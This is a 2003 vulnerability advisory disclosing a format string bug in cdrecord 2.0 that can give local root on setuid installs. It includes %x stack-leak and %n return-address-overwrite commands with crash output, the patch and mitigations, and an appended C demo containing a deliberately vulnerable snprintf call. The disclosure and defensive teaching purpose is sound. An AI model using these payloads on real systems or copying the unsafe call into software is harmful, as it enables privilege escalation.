----------------------------------------------------------------------------
PACKAGE  : cdrtools
VERSION  : 2.0
SUMMARY  : Format String
SEVERITY : local root exploit if suid (on several distros)
DATE     : 2003-05-05
----------------------------------------------------------------------------

Hi,

I would like to inform you that there is a format string vulnerability in
cdrecord 2.0, specifically at line 273 of libscg/scsiopen.c:

--------------------------------------------------------------
   271         if (scg__open(scgp, devname) <= 0) {
   272                 if (errs && scgp->errstr)
>>>273                         js_snprintf(errs, slen, scgp->errstr);<<<<
   274                 scg_sfree(scgp);
   275                 return ((SCSI *)0);
   276         }
--------------------------------------------------------------

scgp->errstr contains the user-supplied device name and is passed to
js_snprintf() as the format string, with no arguments, so every %
conversion in the device name is interpreted by the formatter.

_______________________________________________________
!------- W A R N I N G -----------!
!--- this is an exploitable vulnerability! ---!
!----------------------------------------------!

Cdrecord is installed setuid root on several distributions, so this is a
real security hole.

e.g.

$ ./cdrecord dev="AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x" int.c
Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: No such file or directory.
Cannot open 'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.

As you can see, the last %x conversions print 41414141 42424242, i.e. the
AAAABBBBCCCC prefix of the string itself, so a %n at that position writes
through an address I supply and I can overwrite anything I want. For
example, I can find the location of the return address on the stack, let's
say 0xbffcffcc, put it at the start of the string least significant byte
first (the command below uses \xec\xed\xff\xbf, i.e. 0xbfffedec) and walk up
to it with %x before the %n:

$ ./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c
.....snip....
(core dump)

$ gdb `which cdrecord` core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

EIP is 0x3f (63), the number of characters written before the %n was
reached, so the saved return address was overwritten with a value chosen
by the format string: it's exploitable.

Solutions:

A.
Updated package can be found on:
   ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of libscg/scsiopen.c with:

       js_snprintf(errs, slen, "%s", scgp->errstr);

C. Remove the suid bit with:

       chmod 755 `which cdrecord`

Regards,
Stefano Di Paola

------------------
Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com
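The bug at line 273 beside fix B, as an added stand-alone C example (not code from the advisory or from cdrtools): the error string is modelled on the "Cannot open '...'" message shown in the output above, the function names are my own, and the real construction of scgp->errstr is not reproduced. The vulnerable call uses only %x, which reads words off the stack, so it runs without crashing; the fixed call passes the same string as data behind a literal "%s".

```c
#include <stdio.h>
#include <string.h>

/* The compiler's "format not a string literal" warning is exactly the bug
 * reproduced on purpose below, so it is silenced here to keep the build quiet. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Models what the library does before line 273: the user-controlled device
 * name is embedded into the error string (constructed wording, assumption). */
static void build_errstr(const char *devname, char *errstr, size_t n)
{
    snprintf(errstr, n, "Cannot open '%s'.", devname);
}

/* Vulnerable, as at line 273: errstr is the FORMAT and there are no
 * arguments, so %x in devname prints stack words and %n would write. */
int open_error_vulnerable(const char *devname, char *errs, size_t slen)
{
    char errstr[256];
    build_errstr(devname, errstr, sizeof errstr);
    return snprintf(errs, slen, errstr);
}

/* Fixed, as in solution B: errstr is an argument to the literal "%s"
 * format, so its % characters are copied, never interpreted. */
int open_error_fixed(const char *devname, char *errs, size_t slen)
{
    char errstr[256];
    build_errstr(devname, errstr, sizeof errstr);
    return snprintf(errs, slen, "%s", errstr);
}

/* Audit helper: number of conversions an attacker gets to run if this
 * string ever reaches a format parameter. "%%" is an escaped percent. */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" prints one '%' and consumes nothing */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed input with the same shape as the dev= argument above. */
    const char *devname = "AAAABBBBCCCC|%x%x%x%x";
    char vuln[256], fixed[256];

    open_error_vulnerable(devname, vuln, sizeof vuln);
    open_error_fixed(devname, fixed, sizeof fixed);

    printf("vulnerable: %s\n", vuln);   /* the %x became hex stack words */
    printf("fixed     : %s\n", fixed);  /* the %x survive as plain text */
    printf("%d conversions under attacker control\n",
           count_conversions(devname));
    return 0;
}
```

The demo stops at information leakage on purpose: a %n in the device name is what turns this into a write, and current glibc builds with _FORTIFY_SOURCE abort on %n when the format string lives in writable memory, so the stack-read version is the portable way to see the difference between the two calls.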